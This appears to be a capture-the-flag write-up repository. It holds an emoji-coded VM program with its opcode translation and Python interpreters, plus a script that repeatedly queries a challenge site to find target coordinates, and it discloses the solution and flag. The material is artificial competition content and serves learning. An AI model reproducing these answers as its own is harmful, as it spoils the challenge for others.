14 | 🚛 🥇 1️⃣ 2️⃣ 8️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇
15 | 🚛 🥇 1️⃣ 2️⃣ 7️⃣ 4️⃣ 1️⃣ ✋ 📥 🥇
16 | 🚛 🥇 1️⃣ 2️⃣ 5️⃣ 3️⃣ 3️⃣ ✋ 📥 🥇
17 | 🚛 🥇 1️⃣ 1️⃣ 5️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
18 | 🚛 🥇 1️⃣ 1️⃣ 3️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
19 | 🚛 🥇 1️⃣ 0️⃣ 5️⃣ 0️⃣ 3️⃣ ✋ 📥 🥇
20 | 🚛 🥇 1️⃣ 0️⃣ 5️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
21 | 🚛 🥇 1️⃣ 0️⃣ 3️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
22 | 🚛 🥇 9️⃣ 7️⃣ 5️⃣ ✋ 📥 🥇
23 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ ✋ 📥 🥇
24 | 🚛 🥇 8️⃣ 9️⃣ 2️⃣ ✋ 📥 🥇
25 | 🚛 🥇 8️⃣ 9️⃣ 3️⃣ ✋ 📥 🥇
26 | 🚛 🥇 6️⃣ 6️⃣ 0️⃣ ✋ 📥 🥇
27 | 🚛 🥇 7️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇
28 | 🚛 🥇 2️⃣ 6️⃣ 7️⃣ ✋ 📥 🥇
29 | 🚛 🥇 3️⃣ 4️⃣ 4️⃣ ✋ 📥 🥇
30 | 🚛 🥇 2️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇
31 | 🚛 🥇 3️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇
32 | 🚛 🥇 2️⃣ 0️⃣ 8️⃣ ✋ 📥 🥇
33 | 🚛 🥇 2️⃣ 1️⃣ 6️⃣ ✋ 📥 🥇
34 | 🚛 🥇 2️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
35 | 🚛 🥇 1️⃣ 7️⃣ 2️⃣ ✋ 📥 🥇
36 | 🚛 🥇 7️⃣ 4️⃣ ✋ 📥 🥇
37 | 🚛 🥇 4️⃣ 9️⃣ ✋ 📥 🥇
38 | 🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
39 | 🚛 🥇 1️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇
40 | 🚛 🥇 1️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
41 | 🚛 🥇 1️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇
42 | 🚛 🥈 1️⃣ ✋
43 |
44 | 🖋💠🔶🎌🚩🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 3️⃣ 8️⃣ 9️⃣ ✋
45 | 📥 🥇 📥 🥈
46 | 🏀 💰🏁🚩🎌💠🔶
47 | 🌓 🎤
48 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
49 | 😄 🏀 💰💠🔶🎌🚩🏁 😐
50 |
51 | 🚛 🥇 9️⃣ 8️⃣ 4️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
52 | 🚛 🥇 9️⃣ 7️⃣ 8️⃣ 5️⃣ 0️⃣ ✋ 📥 🥇
53 | 🚛 🥇 9️⃣ 7️⃣ 6️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
54 | 🚛 🥇 9️⃣ 7️⃣ 2️⃣ 8️⃣ 0️⃣ ✋ 📥 🥇
55 | 🚛 🥇 9️⃣ 6️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇
56 | 🚛 🥇 9️⃣ 6️⃣ 4️⃣ 4️⃣ 3️⃣ ✋ 📥 🥇
57 | 🚛 🥇 9️⃣ 6️⃣ 3️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇
58 | 🚛 🥇 9️⃣ 5️⃣ 9️⃣ 3️⃣ 4️⃣ ✋ 📥 🥇
59 | 🚛 🥇 9️⃣ 4️⃣ 8️⃣ 6️⃣ 5️⃣ ✋ 📥 🥇
60 | 🚛 🥇 9️⃣ 4️⃣ 9️⃣ 5️⃣ 2️⃣ ✋ 📥 🥇
61 | 🚛 🥇 9️⃣ 4️⃣ 6️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇
62 | 🚛 🥇 9️⃣ 4️⃣ 4️⃣ 4️⃣ 0️⃣ ✋ 📥 🥇
63 | 🚛 🥇 9️⃣ 3️⃣ 9️⃣ 6️⃣ 9️⃣ ✋ 📥 🥇
64 | 🚛 🥇 9️⃣ 3️⃣ 7️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇
65 | 🚛 🥈 9️⃣ 9️⃣ ✋
66 |
67 | 🖋💠🏁🎌🔶🚩 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 5️⃣ 6️⃣ 8️⃣ ✋
68 | 📥 🥇 📥 🥈
69 | 🏀 💰🏁🚩🎌💠🔶
70 | 🌓 🎤
71 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
72 | 😄 🏀 💰💠🏁🎌🔶🚩 😐
73 |
74 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 1️⃣ 4️⃣ 1️⃣ 0️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
75 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 6️⃣ 0️⃣ 2️⃣ 0️⃣ 6️⃣ ✋ 📥 🥇
76 | 🚛 🥇 1️⃣ 0️⃣ 1️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 5️⃣ 5️⃣ ✋ 📥 🥇
77 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 9️⃣ 9️⃣ 8️⃣ 9️⃣ 6️⃣ 6️⃣ ✋ 📥 🥇
78 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 8️⃣ 8️⃣ 7️⃣ 9️⃣ 9️⃣ 0️⃣ ✋ 📥 🥇
79 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 6️⃣ 7️⃣ 0️⃣ 8️⃣ 5️⃣ ✋ 📥 🥇
80 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 7️⃣ 0️⃣ 7️⃣ 0️⃣ 3️⃣ 6️⃣ ✋ 📥 🥇
81 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 6️⃣ 5️⃣ 6️⃣ 1️⃣ 1️⃣ 1️⃣ ✋ 📥 🥇
82 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 4️⃣ 0️⃣ 4️⃣ 0️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
83 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 6️⃣ 0️⃣ 9️⃣ 2️⃣ 2️⃣ ✋ 📥 🥇
84 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 3️⃣ 1️⃣ 0️⃣ 1️⃣ 9️⃣ ✋ 📥 🥇
85 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 1️⃣ 1️⃣ 1️⃣ 1️⃣ 0️⃣ 0️⃣ ✋ 📥 🥇
86 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 5️⃣ 9️⃣ 9️⃣ 2️⃣ 6️⃣ ✋ 📥 🥇
87 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 4️⃣ 9️⃣ 9️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇
88 | 🚛 🥇 1️⃣ 0️⃣ 0️⃣ 0️⃣ 3️⃣ 0️⃣ 0️⃣ 4️⃣ 5️⃣ ✋ 📥 🥇
89 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 9️⃣ 9️⃣ 9️⃣ 7️⃣ ✋ 📥 🥇
90 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 1️⃣ 8️⃣ 5️⃣ 8️⃣ ✋ 📥 🥇
91 | 🚛 🥇 9️⃣ 9️⃣ 8️⃣ 0️⃣ 8️⃣ 1️⃣ 5️⃣ ✋ 📥 🥇
92 | 🚛 🥇 9️⃣ 9️⃣ 7️⃣ 8️⃣ 8️⃣ 4️⃣ 2️⃣ ✋ 📥 🥇
93 | 🚛 🥇 9️⃣ 9️⃣ 6️⃣ 5️⃣ 7️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
94 | 🚛 🥇 9️⃣ 9️⃣ 5️⃣ 7️⃣ 5️⃣ 6️⃣ 4️⃣ ✋ 📥 🥇
95 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 8️⃣ 3️⃣ 0️⃣ 4️⃣ ✋ 📥 🥇
96 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 5️⃣ 4️⃣ 2️⃣ 7️⃣ ✋ 📥 🥇
97 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 2️⃣ 2️⃣ 8️⃣ 9️⃣ ✋ 📥 🥇
98 | 🚛 🥇 9️⃣ 9️⃣ 3️⃣ 1️⃣ 4️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
99 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 7️⃣ 3️⃣ 8️⃣ 8️⃣ ✋ 📥 🥇
100 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 6️⃣ 3️⃣ 7️⃣ 6️⃣ ✋ 📥 🥇
101 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 3️⃣ 2️⃣ 1️⃣ 3️⃣ ✋ 📥 🥇
102 | 🚛 🥇 9️⃣ 9️⃣ 2️⃣ 1️⃣ 3️⃣ 9️⃣ 4️⃣ ✋ 📥 🥇
103 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 9️⃣ 1️⃣ 5️⃣ 4️⃣ ✋ 📥 🥇
104 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 8️⃣ 0️⃣ 8️⃣ 2️⃣ ✋ 📥 🥇
105 | 🚛 🥇 9️⃣ 9️⃣ 1️⃣ 6️⃣ 2️⃣ 3️⃣ 9️⃣ ✋ 📥 🥇
106 | 🚛 🥈 7️⃣ 6️⃣ 5️⃣ ✋
107 |
108 | 🖋🚩💠🎌🔶🏁 🍿 🥇 📥 🥈 📥 🥇 🚛 🥇 1️⃣ 0️⃣ 2️⃣ 3️⃣ ✋
109 | 📥 🥇 📥 🥈
110 | 🏀 💰🏁🚩🎌💠🔶
111 | 🌓 🎤
112 | 🚛 🥇 1️⃣ ✋ 📥 🥇 🍡 🍿 🥈
113 | 😄 🏀 💰🚩💠🎌🔶🏁 😐
114 | ⌛
115 |
116 | 🖋🏁🚩🎌💠🔶
117 | 🚛 🥇 2️⃣ ✋ 📥 🥇 🖋💠🎌🏁🚩🔶
118 | 🏀 💰🚩🔶🏁🎌💠
119 | 🖋🔶🎌🚩💠🏁 😲 📤 🏀 💰🔶🚩💠🏁🎌 ✋ 😐
120 | 📤 🏀 💰🎌🏁💠🔶🚩
121 | 🖋🎌🏁🚩🔶💠 😲 📤 🏀 💰🔶🚩💠🏁🎌 😐
122 | 📤 🍿 🥇 🚛 🥈 1️⃣ ✋ 📥 🥈 🔪
123 | 😲 📤 🍿 🥈 📥 🥇 📥 🥈 ⛰ 😐 📥 🥇
124 | 🖋🔶🚩💠🏁🎌 🚛 🥈 1️⃣ ✋ 📥 🥈 🍡 🏀 💰💠🎌🏁🚩🔶
125 |
126 | 🖋🚩🔶🏁🎌💠
127 | 🤡 🚛 🥇 2️⃣ ✋ 📥 🥇
128 | 🖋🎌🚩💠🔶🏁 🔪 😲 📤 🚛 🥇 1️⃣ ✋ 📥 🥇
129 | 🏀 💰🔶🎌🚩💠🏁 😐
130 | 📤 🤡 📥 🥇
131 | 📬 😲 🏀 💰🔶🎌🚩💠🏁 😐
132 | 📤 🤡 📥 🥇 🚛 🥇 1️⃣ ✋
133 | 📥 🥇 🍡 🤡 🍿 🥇 🏀 💰🎌🚩💠🔶🏁
134 |
135 | 🖋🎌🏁💠🔶🚩
136 | 🤡 🤡 🚛 🥈 0️⃣ ✋ 📥 🥈
137 | 🖋🏁💠🔶🚩🎌 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇
138 | ⭐ 🍿 🥈 📥 🥇 📬
139 | 📥 🥈 🍡 🍿 🥈 🍿 🥇 🤡 📥 🥈 🔪
140 | 😲 📤 🚛 🥈 1️⃣ ✋ 📥 🥈 🏀 💰🎌🏁🚩🔶💠 😐
141 | 📤 📥 🥇 🚛 🥇 1️⃣ 0️⃣ ✋ 📥 🥇 📐
142 | 😲 🏀 💰🎌🏁🚩🔶💠 😐
143 | 🤡 📥 🥈 🏀 💰🏁💠🔶🚩🎌
144 |
--------------------------------------------------------------------------------
/07-reversing-emoji/translated:
--------------------------------------------------------------------------------
1 | push 0
2 | push 17488
3 | push 16758
4 | push 16599
5 | push 16285
6 | push 16094
7 | push 15505
8 | push 15417
9 | push 14832
10 | push 14450
11 | push 13893
12 | push 13926
13 | push 13437
14 | push 12833
15 | push 12741
16 | push 12533
17 | push 11504
18 | push 11342
19 | push 10503
20 | push 10550
21 | push 10319
22 | push 975
23 | push 1007
24 | push 892
25 | push 893
26 | push 660
27 | push 743
28 | push 267
29 | push 344
30 | push 264
31 | push 339
32 | push 208
33 | push 216
34 | push 242
35 | push 172
36 | push 74
37 | push 49
38 | push 119
39 | push 113
40 | push 119
41 | push 106
42 | pop acc1
43 | push 1
44 | push 106
45 | push 389
46 | push 1
47 | jump_to
48 | xor
49 | print_top
50 | push 1
51 | add
52 | pop acc2
53 | if_not_zero
54 | jump_to
55 | push 98426
56 | push 97850
57 | push 97604
58 | push 97280
59 | push 96815
60 | push 96443
61 | push 96354
62 | push 95934
63 | push 94865
64 | push 94952
65 | push 94669
66 | push 94440
67 | push 93969
68 | push 93766
69 | pop acc1
70 | push 99
71 | push 93766
72 | push 568
73 | push 99
74 | jump_to
75 | xor
76 | print_top
77 | push 1
78 | add
79 | pop acc2
80 | if_not_zero
81 | jump_to
82 | push 101141058
83 | push 101060206
84 | push 101030055
85 | push 100998966
86 | push 100887990
87 | push 100767085
88 | push 100707036
89 | push 100656111
90 | push 100404094
91 | push 100160922
92 | push 100131019
93 | push 100111100
94 | push 100059926
95 | push 100049982
96 | push 100030045
97 | push 9989997
98 | push 9981858
99 | push 9980815
100 | push 9978842
101 | push 9965794
102 | push 9957564
103 | push 9938304
104 | push 9935427
105 | push 9932289
106 | push 9931494
107 | push 9927388
108 | push 9926376
109 | push 9923213
110 | push 9921394
111 | push 9919154
112 | push 9918082
113 | push 9916239
114 | pop acc1
115 | push 765
116 | push 9916239
117 | push 1023
118 | push 765
119 | jump_to
120 | xor
121 | print_top
122 | push 1
123 | add
124 | pop acc2
125 | if_not_zero
126 | jump_to
127 | exit
128 | push 2
129 | jump_to
130 | if_zero
131 | pop_out
132 | jump_to
133 | pop_out
134 | jump_to
135 | if_zero
136 | pop_out
137 | jump_to
138 | pop_out
139 | pop acc1
140 | push 1
141 | sub
142 | if_zero
143 | pop_out
144 | pop acc2
145 | push 2
146 | push 1
147 | jump_top
148 | push 2
149 | push 1
150 | add
151 | jump_to
152 | clone
153 | push 2
154 | sub
155 | if_zero
156 | pop_out
157 | push 1
158 | jump_to
159 | pop_out
160 | clone
161 | push 1
162 | modulo
163 | if_zero
164 | jump_to
165 | pop_out
166 | clone
167 | push 1
168 | push 1
169 | add
170 | clone
171 | pop acc1
172 | jump_to
173 | clone
174 | clone
175 | push 0
176 | push 10
177 | multiply
178 | pop acc2
179 | push 10
180 | modulo
181 | push 10
182 | add
183 | pop acc2
184 | pop acc1
185 | clone
186 | push 10
187 | sub
188 | if_zero
189 | pop_out
190 | push 1
191 | jump_to
192 | pop_out
193 | push 10
194 | push 10
195 | divide
196 | if_zero
197 | jump_to
198 | clone
199 | push 1
200 | jump_to
201 |
--------------------------------------------------------------------------------
/07-reversing-emoji/vm.modified.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | # Implements a simple stack-based VM
4 | class VM:
5 |
6 | def __init__(self, rom):
7 | self.rom = rom
8 | self.accumulator1 = 0
9 | self.accumulator2 = 0
10 | self.instruction_pointer = 1
11 | self.stack = []
12 |
13 | def step(self):
14 | cur_ins = self.rom[self.instruction_pointer]
15 | self.instruction_pointer += 1
16 |
17 | fn = VM.OPERATIONS.get(cur_ins, None)
18 |
19 | if cur_ins[0] == '🖋':
20 | return
21 | if fn is None:
22 | raise RuntimeError("Unknown instruction '{}' at {}".format(
23 | repr(cur_ins), self.instruction_pointer - 1))
24 | else:
25 | fn(self)
26 |
27 | def add(self):
28 | self.stack.append(self.stack.pop() + self.stack.pop())
29 |
30 | def sub(self):
31 | a = self.stack.pop()
32 | b = self.stack.pop()
33 | self.stack.append(b - a)
34 |
35 | def if_zero(self):
36 | if self.stack[-1] == 0:
37 | while self.rom[self.instruction_pointer] != '😐':
38 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
39 | break
40 | self.step()
41 | else:
42 | self.find_first_endif()
43 | self.instruction_pointer += 1
44 |
45 | def if_not_zero(self):
46 | if self.stack[-1] != 0:
47 | while self.rom[self.instruction_pointer] != '😐':
48 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
49 | break
50 | self.step()
51 | else:
52 | self.find_first_endif()
53 | self.instruction_pointer += 1
54 |
55 | def find_first_endif(self):
56 | while self.rom[self.instruction_pointer] != '😐':
57 | self.instruction_pointer += 1
58 |
59 | def jump_to(self):
60 | marker = self.rom[self.instruction_pointer]
61 | if marker[0] != '💰':
62 | print('Incorrect symbol : ' + marker[0])
63 | raise SystemExit()
64 | marker = '🖋' + marker[1:]
65 | self.instruction_pointer = self.rom.index(marker) + 1
66 |
67 | def jump_top(self):
68 | self.instruction_pointer = self.stack.pop()
69 |
70 | def exit(self):
71 | print('\nDone.')
72 | raise SystemExit()
73 |
74 | def print_top(self):
75 | sys.stdout.write(chr(self.stack.pop()))
76 | sys.stdout.flush()
77 |
78 | def push(self):
79 | if self.rom[self.instruction_pointer] == '🥇':
80 | self.stack.append(self.accumulator1)
81 | elif self.rom[self.instruction_pointer] == '🥈':
82 | self.stack.append(self.accumulator2)
83 | else:
84 | raise RuntimeError('Unknown instruction {} at position {}'.format(
85 | self.rom[self.instruction_pointer], str(self.instruction_pointer)))
86 | self.instruction_pointer += 1
87 |
88 | def pop(self):
89 | if self.rom[self.instruction_pointer] == '🥇':
90 | self.accumulator1 = self.stack.pop()
91 | elif self.rom[self.instruction_pointer] == '🥈':
92 | self.accumulator2 = self.stack.pop()
93 | else:
94 | raise RuntimeError('Unknown instruction {} at position {}'.format(
95 | self.rom[self.instruction_pointer], str(self.instruction_pointer)))
96 | self.instruction_pointer += 1
97 |
98 | def pop_out(self):
99 | self.stack.pop()
100 |
101 | def load(self):
102 | num = 0
103 |
104 | if self.rom[self.instruction_pointer] == '🥇':
105 | acc = 1
106 | elif self.rom[self.instruction_pointer] == '🥈':
107 | acc = 2
108 | else:
109 | raise RuntimeError('Unknown instruction {} at position {}'.format(
110 | self.rom[self.instruction_pointer], str(self.instruction_pointer)))
111 | self.instruction_pointer += 1
112 |
113 | while self.rom[self.instruction_pointer] != '✋':
114 | num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0'))
115 | self.instruction_pointer += 1
116 |
117 | if acc == 1:
118 | self.accumulator1 = num
119 | else:
120 | self.accumulator2 = num
121 |
122 | self.instruction_pointer += 1
123 |
124 | def clone(self):
125 | self.stack.append(self.stack[-1])
126 |
127 | def multiply(self):
128 | a = self.stack.pop()
129 | b = self.stack.pop()
130 | self.stack.append(b * a)
131 |
132 | def divide(self):
133 | a = self.stack.pop()
134 | b = self.stack.pop()
135 | self.stack.append(b // a)
136 |
137 | def modulo(self):
138 | a = self.stack.pop()
139 | b = self.stack.pop()
140 | self.stack.append(b % a)
141 |
142 | def xor(self):
143 | a = self.stack.pop()
144 | b = self.stack.pop()
145 | print("{} ^ {}\n".format(b, a))
146 | self.stack.append(b ^ a)
147 |
148 | OPERATIONS = {
149 | '🍡': add,
150 | '🤡': clone,
151 | '📐': divide,
152 | '😲': if_zero,
153 | '😄': if_not_zero,
154 | '🏀': jump_to,
155 | '🚛': load,
156 | '📬': modulo,
157 | '⭐': multiply,
158 | '🍿': pop,
159 | '📤': pop_out,
160 | '🎤': print_top,
161 | '📥': push,
162 | '🔪': sub,
163 | '🌓': xor,
164 | '⛰': jump_top,
165 | '⌛': exit
166 | }
167 |
168 |
169 | if __name__ == '__main__':
170 | if len(sys.argv) != 2:
171 | print('Missing program')
172 | raise SystemExit()
173 |
174 | with open(sys.argv[1], 'r') as f:
175 | print('Running ....')
176 | all_ins = ['']
177 | all_ins.extend(f.read().split())
178 | vm = VM(all_ins)
179 |
180 | while 1:
181 | vm.step()
182 |
--------------------------------------------------------------------------------
/07-reversing-emoji/vm.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | # Implements a simple stack-based VM
4 | class VM:
5 |
6 | def __init__(self, rom):
7 | self.rom = rom
8 | self.accumulator1 = 0
9 | self.accumulator2 = 0
10 | self.instruction_pointer = 1
11 | self.stack = []
12 |
13 | def step(self):
14 | cur_ins = self.rom[self.instruction_pointer]
15 | self.instruction_pointer += 1
16 |
17 | fn = VM.OPERATIONS.get(cur_ins, None)
18 |
19 | if cur_ins[0] == '🖋':
20 | return
21 | if fn is None:
22 | raise RuntimeError("Unknown instruction '{}' at {}".format(
23 | repr(cur_ins), self.instruction_pointer - 1))
24 | else:
25 | fn(self)
26 |
27 | def add(self):
28 | self.stack.append(self.stack.pop() + self.stack.pop())
29 |
30 | def sub(self):
31 | a = self.stack.pop()
32 | b = self.stack.pop()
33 | self.stack.append(b - a)
34 |
35 | def if_zero(self):
36 | if self.stack[-1] == 0:
37 | while self.rom[self.instruction_pointer] != '😐':
38 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
39 | break
40 | self.step()
41 | else:
42 | self.find_first_endif()
43 | self.instruction_pointer += 1
44 |
45 | def if_not_zero(self):
46 | if self.stack[-1] != 0:
47 | while self.rom[self.instruction_pointer] != '😐':
48 | if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
49 | break
50 | self.step()
51 | else:
52 | self.find_first_endif()
53 | self.instruction_pointer += 1
54 |
55 | def find_first_endif(self):
56 | while self.rom[self.instruction_pointer] != '😐':
57 | self.instruction_pointer += 1
58 |
59 | def jump_to(self):
60 | marker = self.rom[self.instruction_pointer]
61 | if marker[0] != '💰':
62 | print('Incorrect symbol : ' + marker[0])
63 | raise SystemExit()
64 | marker = '🖋' + marker[1:]
65 | self.instruction_pointer = self.rom.index(marker) + 1
66 |
67 | def jump_top(self):
68 | self.instruction_pointer = self.stack.pop()
69 |
70 | def exit(self):
71 | print('\nDone.')
72 | raise SystemExit()
73 |
74 | def print_top(self):
75 | sys.stdout.write(chr(self.stack.pop()))
76 | sys.stdout.flush()
77 |
78 | def push(self):
79 | if self.rom[self.instruction_pointer] == '🥇':
80 | self.stack.append(self.accumulator1)
81 | elif self.rom[self.instruction_pointer] == '🥈':
82 | self.stack.append(self.accumulator2)
83 | else:
84 | raise RuntimeError('Unknown instruction {} at position {}'.format(
85 | self.rom[self.instruction_pointer], str(self.instruction_pointer)))
86 | self.instruction_pointer += 1
87 |
88 | def pop(self):
89 | if self.rom[self.instruction_pointer] == '🥇':
90 | self.accumulator1 = self.stack.pop()
91 | elif self.rom[self.instruction_pointer] == '🥈':
92 | self.accumulator2 = self.stack.pop()
93 | else:
94 | raise RuntimeError('Unknown instruction {} at position {}'.format(
95 | self.rom[self.instruction_pointer], str(self.instruction_pointer)))
96 | self.instruction_pointer += 1
97 |
98 | def pop_out(self):
99 | self.stack.pop()
100 |
101 | def load(self):
102 | num = 0
103 |
104 | if self.rom[self.instruction_pointer] == '🥇':
105 | acc = 1
106 | elif self.rom[self.instruction_pointer] == '🥈':
107 | acc = 2
108 | else:
109 | raise RuntimeError('Unknown instruction {} at position {}'.format(
110 | self.rom[self.instruction_pointer], str(self.instruction_pointer)))
111 | self.instruction_pointer += 1
112 |
113 | while self.rom[self.instruction_pointer] != '✋':
114 | num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0'))
115 | self.instruction_pointer += 1
116 |
117 | if acc == 1:
118 | self.accumulator1 = num
119 | else:
120 | self.accumulator2 = num
121 |
122 | self.instruction_pointer += 1
123 |
124 | def clone(self):
125 | self.stack.append(self.stack[-1])
126 |
127 | def multiply(self):
128 | a = self.stack.pop()
129 | b = self.stack.pop()
130 | self.stack.append(b * a)
131 |
132 | def divide(self):
133 | a = self.stack.pop()
134 | b = self.stack.pop()
135 | self.stack.append(b // a)
136 |
137 | def modulo(self):
138 | a = self.stack.pop()
139 | b = self.stack.pop()
140 | self.stack.append(b % a)
141 |
142 | def xor(self):
143 | a = self.stack.pop()
144 | b = self.stack.pop()
145 | self.stack.append(b ^ a)
146 |
147 | OPERATIONS = {
148 | '🍡': add,
149 | '🤡': clone,
150 | '📐': divide,
151 | '😲': if_zero,
152 | '😄': if_not_zero,
153 | '🏀': jump_to,
154 | '🚛': load,
155 | '📬': modulo,
156 | '⭐': multiply,
157 | '🍿': pop,
158 | '📤': pop_out,
159 | '🎤': print_top,
160 | '📥': push,
161 | '🔪': sub,
162 | '🌓': xor,
163 | '⛰': jump_top,
164 | '⌛': exit
165 | }
166 |
167 |
168 | if __name__ == '__main__':
169 | if len(sys.argv) != 2:
170 | print('Missing program')
171 | raise SystemExit()
172 |
173 | with open(sys.argv[1], 'r') as f:
174 | print('Running ....')
175 | all_ins = ['']
176 | all_ins.extend(f.read().split())
177 | vm = VM(all_ins)
178 |
179 | while 1:
180 | vm.step()
181 |
--------------------------------------------------------------------------------
/08-misc-drive-to-target/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Drive to the target
3 | Label: coding
4 |
5 | Excellent work! With your fine sleuthing skills, you managed to find a picture of the handsome creature with its pet biped. At last friends and companionship may be near!
6 |
7 | Like all inhabitants of this world, you spend an inordinate amount of time on the site, stalking and comparing your life to that of others. The first thought that springs to your mind is "Why haven't I ever been to Mauritius on holiday?" followed swiftly by "What is a Mauritius anyway?" But after a while and with language successfully deciphered, you've made contact with the lifeform in the picture, you have a "date"? You're given the address of where to meet your potential interest. "1 Banana way, beware of the glass." An odd address, especially that last part. So how do you get there? You land your ship and begin to search.
8 |
9 | # Solution
10 | This task is a link to the site `https://drivetothetarget.web.ctfcompetition.com`. The site contains two inputs for lattitude and longitude. Choosing values will tell you your speed and text if you are getting closer or further. It seems that the goal is to find the correct location but you can only move a bit at a time. Playing with the numbers, decrementing lat and lon gives us the message that we are getting closer. Some other important facts: When the message says that you traveled too fast, if you retry the same value, eventually it will work. Next, a new token is given in a hiden input field. With these facts, we can write a script that continuously decrements the lat and lon, and retries if it fails. It also appears that the token identifies your location which is how it calculates the distance you can travel.
11 |
12 | The script `drive.py` continuously decrements `lon` until the message says that we are moving away. Then it switches to decrementing `lat`. Something important that I didn't add is a check for the text `CTF` in case we find it as I was monitoring it mostly. I found the the default of `0.0001` increment worked well. This is marked as a 'coding' task but i'm not sure if just spamming a ton of calls is the right way to approach this. Maybe there is a way to calculate the token. It would also be better optimized if both lat an lon were decremented but I didn't know if that would work in case you had to decrement one more than the other.
13 |
14 | At `{'lat': '51.4921', 'lon': '-0.1929', 'token': 'gAAAAABdEwWoQWGTXd5P1nB6paz9PWM-LbxNr_bfmaAC5qVJZXwanyHyGPUHqFZIj9hj3I3Q1mqG3jpWEIgLO3z7C_tu7MsEDb33TL3FFyUtM0gxFmFMc-Xs6K8h57Wu-yl5IB-ZNJgY'}`, the script got stuck in a loop printing out `If you want to meet your friends, you should move.` because I forgot the exit condition. So at that point I just manually adjusted the values. And the final values are
15 | `{'lat': '51.4921', 'lon': '-0.1929'}` with the flag `CTF{Who_is_Tardis_Ormandy}`. In all, it took quite a long time to run.
--------------------------------------------------------------------------------
/08-misc-drive-to-target/drive.py:
--------------------------------------------------------------------------------
1 | # requires requests and requests-html
2 |
3 | from requests_html import HTMLSession
4 | from urllib.parse import urlparse, parse_qs
5 | import time
6 |
7 | lat = 51.5710
8 | lon = -0.1925
9 | token = 'gAAAAABdEwKRoX1YphdiX0kwxKSsY6CmxjNt-R5hkwf4-Ohktb7oyZJRkrX-LK5j12wuj_jgSNjY9wG53zrifwIe1OMk23uTX7LJaYzB7gWRPFUBXYqePYLekg4Z2RgMt3HE0ehzP50Y'
10 | url = 'https://drivetothetarget.web.ctfcompetition.com'
11 | inc = 0.0001
12 | is_lat = False
13 |
14 | session = HTMLSession()
15 | while True:
16 | qlat = lat - inc if is_lat else lat
17 | qlon = lon - inc if not is_lat else lon
18 | query = {'lat': "{0:.4f}".format(qlat), 'lon': "{0:.4f}".format(qlon), 'token': token}
19 | r = session.get(url, params=query)
20 | response_url = urlparse(r.url)
21 | response_query = parse_qs(response_url.query)
22 |
23 | token = r.html.find('input')[2].attrs['value']
24 |
25 | print(query)
26 |
27 | try:
28 | response_text = r.html.find('p')[1].text
29 | print(response_text)
30 |
31 | if response_text.startswith('You tried to travel') or response_text.startswith('Woa, were about to move'):
32 | # retry last values
33 | pass
34 | elif response_text.endswith('You are getting closer…'):
35 | # update with new values
36 | lat = float(response_query['lat'][0])
37 | lon = float(response_query['lon'][0])
38 | elif response_text.endswith('You are getting away…'):
39 | if is_lat:
40 | print("done, {}".format(query))
41 | exit()
42 | is_lat = True
43 | except:
44 | print('Error. {}'.format(r.html.text))
45 | print("url: {}".format(r.url))
46 |
47 | # states = [0, 1]
48 | # state = 0
49 | # failcount = 0
50 |
